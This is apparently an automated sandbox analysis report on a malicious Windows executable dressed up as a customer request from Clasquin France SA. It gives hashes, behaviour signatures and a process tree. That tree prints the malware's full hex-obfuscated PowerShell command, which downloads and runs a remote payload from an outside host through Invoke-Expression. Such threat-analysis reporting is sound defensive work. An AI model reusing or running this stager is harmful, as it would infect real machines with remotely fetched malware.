Overview

overview

10

Static

static

Clasquin F...15.exe

windows7_x64

10

Clasquin F...15.exe

windows10_x64

10

Analysis

  • max time kernel
    13s
  • max time network
    126s
  • platform
    windows10_x64
  • resource
    win10
  • submitted
    31-07-2020 10:56

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe

  • Size

    19KB

  • MD5

    36117a183609bb6953d3f78bb45ee5b9

  • SHA1

    0d89d56bac5838a3f0854e43b42e564d290f4935

  • SHA256

    3a58855a902398680563edf448779739201772e044102fe1c733f54fa9c936c1

  • SHA512

    79ff888d369979be614821bc2f74d99aec8b24887edaea4c2b43cffe60942b87311e082bf031bf3111b70578c4814aa43eb01e09d314c776a013fc3c5df8f5c2

Score
10/10

Malware Config

Signatures

  • Blacklisted process makes network request 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious use of AdjustPrivilegeToken 43 IoCs
  • Suspicious behavior: EnumeratesProcesses 3 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe
    "C:\Users\Admin\AppData\Local\Temp\Clasquin France SA - Demande client 001071 - SKBMT-07-31-2020-105-img00215.exe"
    1⤵
      PID:976
    • C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exe
      Powershell -ExecutionPolicy Bypass $TRTTz='24^54^62^6F^6E^65^3D^27^2A^45^58^27^2E^72^65^70^6C^61^63^65^28^27^2A^27^2C^27^49^27^29^3B^73^61^6C^20^4D^20^24^54^62^6F^6E^65^3B^64^6F^20^7B^24^70^69^6E^67^20^3D^20^74^65^73^74^2D^63^6F^6E^6E^65^63^74^69^6F^6E^20^2D^63^6F^6D^70^20^67^6F^6F^67^6C^65^2E^63^6F^6D^20^2D^63^6F^75^6E^74^20^31^20^2D^51^75^69^65^74^7D^20^75^6E^74^69^6C^20^28^24^70^69^6E^67^29^3B^24^70^32^32^20^3D^20^5B^45^6E^75^6D^5D^3A^3A^54^6F^4F^62^6A^65^63^74^28^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^54^79^70^65^5D^2C^20^33^30^37^32^29^3B^5B^53^79^73^74^65^6D^2E^4E^65^74^2E^53^65^72^76^69^63^65^50^6F^69^6E^74^4D^61^6E^61^67^65^72^5D^3A^3A^53^65^63^75^72^69^74^79^50^72^6F^74^6F^63^6F^6C^20^3D^20^24^70^32^32^3B^24^6D^76^3D^27^28^4E^27^2B^27^65^77^27^2B^27^2D^4F^27^2B^27^62^27^2B^27^6A^65^27^2B^27^63^27^2B^27^74^20^27^2B^20^27^4E^65^27^2B^27^74^2E^27^2B^27^57^27^2B^27^65^62^27^2B^27^43^27^2B^27^6C^69^27^2B^27^65^6E^74^29^27^2B^27^2E^44^27^2B^27^6F^77^27^2B^27^6E^6C^27^2B^27^6F^61^27^2B^27^64^27^2B^27^53^27^2B^27^74^72^27^2B^27^69^6E^67^28^27^27^68^74^74^70^3A^2F^2F^6D^65^72^72^69^6D^61^63^6B^2E^69^65^2F^45^30^2E^6A^70^67^27^27^29^27^7C^49^60^45^60^58^3B^24^61^73^63^69^69^43^68^61^72^73^3D^20^24^6D^76^20^2D^73^70^6C^69^74^20^27^2D^27^20^7C^46^6F^72^45^61^63^68^2D^4F^62^6A^65^63^74^20^7B^5B^63^68^61^72^5D^5B^62^79^74^65^5D^22^30^78^24^5F^22^7D^3B^24^61^73^63^69^69^53^74^72^69^6E^67^3D^20^24^61^73^63^69^69^43^68^61^72^73^20^2D^6A^6F^69^6E^20^27^27^7C^4D';$jm=$TRTTz.Split('^') | forEach {[char]([convert]::toint16($_,16))};$jm -join ''|I`E`X
      1⤵
      • Blacklisted process makes network request
      • Process spawned unexpected child process
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious behavior: EnumeratesProcesses
      PID:2020

    Network

    MITRE ATT&CK Matrix

    Replay Monitor

    Loading Replay Monitor...

    Downloads